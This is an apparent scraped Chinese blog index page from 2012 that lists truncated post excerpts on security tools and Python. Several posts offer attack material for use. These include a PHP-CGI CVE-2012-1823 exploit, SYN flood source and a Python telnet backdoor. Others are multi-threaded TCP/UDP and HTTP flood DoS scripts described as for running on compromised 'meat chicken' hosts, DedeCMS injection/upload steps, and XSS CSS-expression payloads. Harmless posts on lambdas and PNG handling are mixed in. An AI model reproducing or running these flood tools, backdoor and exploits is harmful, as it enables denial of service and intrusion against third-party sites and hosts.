- 博客(394)
- 资源 (22)
- 收藏
- 关注
转载 backfuzz - protocol fuzzing toolkit (Python编写)
一个协议fuzzer工具,支持文件fuzzer。研究模糊化的人可以参考代码。也是用python写的。https://github.com/localh0t/backfuzz可以翻墙看看这个:http://localh0t.blogspot.com/2012/03/backfuzz-protocol-fuzzing-toolkit.html
2012-05-10 10:05:06 2386
转载 raft-Response Analysis and Further Testing Tool(Python写的)
下载地址:http://code.google.com/p/raft/RAFT is a testing tool for the identification of vulnerabilities in web applications.RAFT is a suite of tools that utilize common shared elemen
2012-05-10 10:01:19 1094
转载 MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
Microsoft update release http://technet.microsoft.com/en-us/security/bulletin/ms12-032 Possible MS12-032 Proof of concept from StackOverflow thx to @avivra We discovered that running ou
2012-05-10 09:51:34 775
原创 Cve-2012-1823 PHP CGI Argument Injection Exploit
原帖代码地址为:http://www.exploit-db.com/exploits/18836/由于其实为py2.x版本服务的,所以我将代码改为py3了。代码如下:####################################################################################### Exploit Title: Cve
2012-05-08 14:48:10 1407
转载 实战安全工程师训练佳品之WebGoat
实战安全工程师训练佳品之WebGoatWebGoat是由著名的OWASP负责维护的一个漏洞百出的J2EE Web应用程序,这些漏洞并非程序中的bug,而是故意设计用来讲授Web应用程序安全课程的。这个应用程序提供了一个逼真的教学环境,为用户完成课程提供了有关的线索。对 于每堂课,都对应于WebGoat应用程序中的一个实际的安全漏洞,为了能亲身实践如何利用这个漏洞,您首先需要具备该漏
2012-05-08 10:28:21 994 1
转载 CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ 粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。 另外关于RC
2012-05-07 17:32:20 2085
原创 一个syn c源码
#include #include #include #pragma comment(lib,"ws2_32.lib")#define SEQ 0x28376839int threadnum,maxthread,port;char *DestIP;//目标IPvoid display(void) // 定义状态提示函数 { static int play=0;//
2012-05-04 17:42:49 1222 1
转载 (织梦cms)dedecms5.7注入和上传0day
漏洞类型:注入漏洞、上传漏洞漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。 注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergro
2012-04-29 10:55:04 15841
转载 dz2.5 oday
刚群里黑哥丢出个乌云的链接:http://www.wooyun.org/bugs/wooyun-2012-06420问谁上,我说我上吧,职业病,看到discuz dede啥的漏洞一下就精神了,哈哈……过程简单说下,记的有点乱不贴太多代码了diff一下看balabalabala..... if(!defined('IN_DISCUZ')) {@@ -89,7 +
2012-04-27 16:01:09 1732 4
原创 tk gui for py3.2 exp code
from tkinter import *import tkinter.messagebox as tkMessageBoximport tkinter.simpledialog as tkSimpleDialogimport tkinter.filedialog as tkFileDialogimport tkinter.simpledialog as tkSimpleDialogim
2012-04-24 10:20:31 931
原创 telnet backdoor
import socketserver,osPORT = 23class Handler(socketserver.BaseRequestHandler): def handle(self): while True: t='' self.data = self.request.recv(1024).strip()
2012-04-19 00:36:47 815
原创 icmp (http) 隧道技术
实验环境如下:服务器IP:61.183.254.254客户机IP:192.168.1.105Http代理服务器:202.103.24.68 端口:8080现象: 客户机可以ping得通外网服务器,但是却无法上网,出口过滤tcp和udp。目的:客户机可以正常上网。服务器:C:\>ptunnel.exe -v 4 -c "\Device\NPF_{
2012-04-18 23:33:17 3528
原创 apache dos python script
源程序为单线程,毫无杀伤力。修改了以下为多线程。代码如下# Title: PHP 5.4.0 Built-in Web Server DoS PoC# Date: 16 March 2012# Author: ls (contact@kaankivilcim.com)# Reference: https://bugs.php.net/bug
2012-04-18 11:01:01 932
原创 python 多线程tcp udp发包 Dos工具。
现在肉鸡上面linux越来越多,都默认安装了python,有时候没有工具的时候可以自己写一个:下面是支持 tcp和udp的python的发包代码:import socket,sys,threadingif len(sys.argv)!=4: print('使用方法:\n'+sys.argv[0],'目标ip','协议[tcp | udp]','线程数')
2012-04-17 16:31:00 7336 2
原创 python随机密码
def getpwd(): a='''!"#$%&\'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~''' password='' for i in range(7): password=
2012-04-14 21:16:44 1372
原创 关于python字符编码
from array import arrays = array("H", range(0, 0x10000)).tostring()gbk = s.decode("gbk", "ignore")gb2312 = s.decode("gb2312", "ignore")diff = set(gbk) - set(gb2312)with file("diff.txt", "wb") as
2012-04-11 15:28:21 675
原创 一个iptools库,对ip处理很方便
>>> iptools.IpRange('192.168.1.1','192.168.1.254')('192.168.1.1', '192.168.1.254')>>> iptools.IpRangeList('192.168.2.0/24',('192.168.1.1','192.168.1.254'),('192.168.10/24'))(('192.168.2.0', '192.16
2012-04-05 10:24:15 1804
转载 关于lambda函数
def f(x):... return x*2... >>> f(3)6>>> g = lambda x: x*2>>> g(3)6>>> (lambda x: x*2)(3)6简单的说就是一个简单的函数条用
2012-03-31 15:52:42 600
原创 多语言 hash web dos 代码
不多说。威力巨大。import threading,argparse,sys,socket,reimport urllib.parse as upparser = argparse.ArgumentParser(description='Http range Dos tools,by Yatere.')parser.add_argument('-t',help="Trager's
2012-03-30 11:22:42 1001
转载 xss相关的少见内容
expression的变形千变万化,只需要根据CSS Parser进行FUZZER就能挖掘很多WEBMAIL的XSS 0DAY。 下面是几个我记得的例子: 1.IE的CSS语法解析很宽松,导致的执行代码的特例。 .ExternalClass #ecxx {color:rgb(''zzzz"x:expression(alert());} 2
2012-03-27 19:33:18 865
原创 HTTP RANGE DOS 工具下载
关于绿盟的介绍:http://www.nsfocus.net/index.php?act=alert&do=view&aid=120py2版本#!/usr/bin/env pythonimport optparse, os, re, socket, threading, time, urllib, urllib2, urlparseNAME = "Ki
2012-03-25 21:11:38 1934 2
原创 针对Python 右键没有Edit with IDLE的解决方法
直接把下面代码存入reg并将导入即可Windows Registry Editor Version 5.00[HKEY_CLASSES_ROOT\Python.File\shell\EditwithIDLE]@="&Edit with IDLE"[HKEY_CLASSES_ROOT\Python.File\shell\EditwithIDLE\command]@="
2012-03-24 23:56:16 4105 1
原创 根据时间关机
为了限制我妈使用电脑的程序。是有早上8点以后以及完善8点之前用电脑,否则一开机就是关机。#include #include BOOL MySystemShutdown() { HANDLE hToken; TOKEN_PRIVILEGES tkp; if (!OpenProcessToken(GetCurrentProcess(),
2012-03-24 21:33:31 781
原创 windows 关机 从起代码
需要提升权限啊啊啊啊啊啊#include BOOL MySystemShutdown() { HANDLE hToken; TOKEN_PRIVILEGES tkp; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_Q
2012-03-24 20:50:27 842
原创 python3 下png 模块介绍
以前介绍过PIL,这里介绍一下今天的主教png。官方手册:http://packages.python.org/pypng/ex.html这个模块是用于python下对png图像进行解码和反解码的。可以通过它来实现验证码识别,完成PIL的功能。以下是py3下的例子(跟官方不同,因为py3下range返回的是迭代器不是序列 )生成一个按照你
2012-03-22 21:58:37 9270
原创 py3 的3个 webserver模块 Rocket Cheroot pywebsite
文档地址:http://packages.python.org/rocket/usage.html#usage下载地址:http://pypi.python.org/packages/source/r/rocket/Rocket-1.2.4.zip#md5=fa611955154b486bb91e632a43e90f4b想学习p yweb开发 的可以试试这个
2012-03-22 11:17:49 958
转载 黑客系统Matriux(live cd)下载
介绍:matriux是一个Live CD。是由一组开源和免费的程序和许多安全工具组成,可用于各种用途,但不仅限于这些,渗透测试,道德黑客(黑客防御),系统管理和网络法律研究,安全性测试,脆弱性分析,等等。可以用于各种用途的专业安全人员,他也可作为您的默认操作系统。有了Matriux,你可以做任何系统的渗透测试,以及所有的功能强大的平台,而无需您的硬盘驱动器上安装任何程序。matri
2012-03-21 08:52:27 2990 1
转载 slow post ddos tools torshammer (win32可执行下载)
torshammerwin32 可执行exe下载:http://howfile.com/file/2611e8a1/9c6c9f8f/是针对慢速 post的攻击,针对apache兼职是绝杀socket.py"""SocksiPy - Python SOCKS module.Version 1.00Copyright 2006 D
2012-03-19 18:34:22 7358
原创 win32版 pyloris-3.2下载
pyloris-3.2 是一款用python写的http等多协议ddos软件,经过测试发现威力巨大啊。难怪Anonymous的黑客系统里面自带这个,我已经把它用py2exe转换成exe了,需要的可以下载。官网:http://sourceforge.net/projects/pyloris/PyLoris is a scriptable tool for testing a
2012-03-17 17:40:42 3220
转载 RadioWar_RFID_LiveCD_Alpha315.iso
from:http://radiowar.org/radiowar_livecdRadioWar LiveCD什么是RadioWar LiveCDRadioWar LiveCD是RadioWar所制作的一个开源RFID安全检测的直接引导光盘,该光盘使用的是ubuntu 10.04版本进行修改优化而来的。我们将会作为一项免费的开源项目进行维护,版本更新周期为半年,半年内我
2012-03-17 12:45:34 1996
转载 MS12-020 漏洞利用程序
根据大家的测试,多数为直接蓝屏。根据Silic Group的调查,蓝屏的出现基本可以确定是因为MS11-065补丁的原因。本文的PoC是根据2011年8月出现的MS11-065补丁以后的rdpwd.sys文件结构而写微软通过MS11-065修改了rdpwd.sys文件并更新了版本,所以导致没打过MS11-065的机器就出现了蓝屏等症状。通过本论坛交流群内成员的各种测试结果,发送580
2012-03-16 16:05:29 5587
转载 Anonymous发布Anonymous-OS操作系统
Anonymous已经是大名鼎鼎了吧,最近Anonymous发布了命名为Anonymous-OS的操作系统,基于Ubuntu 11.10,提供各种web渗透测试工具,包括:- ParolaPass Password Generator- Find Host IP- Anonymous HOIC- Ddosim- Pyloris- Slowloris-
2012-03-14 18:00:09 2581
原创 使用google进行关键字搜索的域名采集。
这里是对 “茶叶“ 关键字进行自动采集,并保存和打印相关域名。下面例子是搜索google上面的茶叶相关网站的前2页得例子# -*- coding: utf-8 -*-import pam,timeimport urllib.parse as upfrom bs4 import BeautifulSoupqtxt='茶叶' #关键字namelist=[]def
2012-03-13 23:57:16 2212 1
原创 python3 cc dos脚本
不得不说,效率比我用vc写的是要差多了,线程多了还会报错,配合python的http服务器可以查看效果。毕竟走的不是底层。但是还好,至少本地测试还是明显感觉到效果了。import urllib.request as urimport threading,random,sysurl=sys.argv[1]class mycc(threading.Thread):
2012-03-12 20:46:23 2363
转载 python3.2.2增加了一个新的并发库
http://www.python.org/dev/peps/pep-3148/用过java并发框架的人可能看过后就乐了.这个库很精简,主要有两个核心类: Executor and Future,Executor用来接收异步任务(包含参数),并返回一个Future.Executorsubmit(fn, *args, **kwargs)map(fu
2012-03-12 09:27:22 1757
转载 轻量级调试器神器 - mimikatz
昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下神器下载地址: mimikatz_trunk.zip还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from
2012-03-08 19:31:01 2809
转载 Mongodb安全问题
Mongodb,这么火的玩意其实早就想好好研究一下了。之前一直没空仔细学学新的东西,总是感觉精力不足。这次趁着买了一本书,就零零散散地在VPS上搭建、测试、看实现代码。感觉也蛮有意思的一个数据库。虽然感觉它非常简单,尤其是看代码的时候更是感觉如此。但这不也是另一个KISS的典范么,还是简单但是实用的东西最能流行。既然都看了其实现,也不能不产出点什么。正好多年没更新博文,就简单分析一下mon
2012-03-07 17:36:09 938
原创 ssl ddos攻击
去年早就出来了,可惜没咋注意到2011-OCT-24: News Articles:http://thehackerschoice.wordpress.com/2011/10/24/thc-ssl-dos/http://www.theregister.co.uk/2011/10/24/ssl_dos_tool_released/http://www.zdne
2012-03-07 14:35:48 1769
原创 python 自动采集域名whois 信息。
以前写了一个基于socket的,但是经常要连接不同whois服务器,有些信息还不全。这次直接基于中国站长网,由于目标页面有js动态操作,所以只能使用pam模块了。下面是介绍:吧域名每行一个的写入脚本所在程序目录下的dns.txt,然后运行以下脚本。程序自动为每个域名生成单独htm文件,放于同目录下。pam 和 BeautifulSoup 参考我博客可以找到B
2012-03-06 22:30:12 3062
原创 自动旁注并多进程调用wwwscan扫描旁注结果的python脚本。
本人是py3.2 调用的是bing数据库,httplib2 和 bs4 模块可以网上找找。httplib2支持压缩,所以用他了,默认的不支持。import sys,osfrom bs4 import BeautifulSoupimport httplib2import urllib.parse as upip=sys.argv[1]os.chdir(sys.pat
2012-03-05 10:18:11 2130
hydra 7.2 win32
2012-04-09
用Python做科学计算
2012-04-04
pyloris-3.2-win32
2012-03-17
类似IE的VC编写浏览器
2012-01-28
Using_XSS_to_bypass_CSRF_protection
2012-01-28
C语言难点及分析.
2012-01-28
向其他进程注入代码的三种方法
2012-01-28
网站安全漏洞的产生分析、处理总结
2011-04-21
VC学习大纲 VC学习讲义
2009-06-09
The Analysis Of Basic MFC Program Running Principle
2008-12-29
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人